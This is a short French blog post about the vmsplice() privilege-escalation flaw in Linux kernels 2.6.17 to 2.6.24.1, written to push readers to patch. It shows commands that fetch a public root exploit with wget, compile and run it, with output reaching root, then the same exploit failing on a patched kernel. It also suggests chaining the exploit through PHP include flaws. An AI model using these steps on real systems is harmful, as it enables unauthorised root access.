Depuis peu, une faille a été découverte dans l’appel du système vmsplice(), les noyaux Linux 2.6.17 à 2.6.24.1 sont touchés. Elle est plutôt critique puisqu’un simple utilisateur peut devenir root en l’exploitant.
$ uname -smr
Linux 2.6.23.16.. i686
Voici un exemple d’utilisation :
$ cd /tmp
$ wget http://www.crashdump.fr/~polux/rootexploit/rootexploit.c
$ gcc -o rootexploit rootexploit.c
$ ./rootexploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dee000 .. 0xb7e20000
[+] root
Exploit gone!
# id -u
0
… voila qui est plutôt grave, mettez donc a jour vos kernel:
$ uname -smr
Linux 2.6.24.2.. i686
$ ./rootexploit
-----------------------------------
Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dfc000 .. 0xb7e2e000
[-] vmsplice: Bad address
$ id -u
1000
De plus, on pourrais imaginer une utilisation de cet exploit via des scripts cgi, php,.. Mal programmé – En exploitant une faille include – Et la je vous laisse imaginer le drame !
Un petit conseil donc: Mettez votre système à jour régulièrement !
Possibly Related Posts:
- Crashdump.fr passe en AES-256.
- Effacer définitivement les données d’un disque dur sous *nux (dd, zero, random)
- ARP Spoofing (ARP Cache poisoning)
- HackThisSite.org Basic Howto: 1 à 10
- Protocole BGP, l’Internet en danger ?
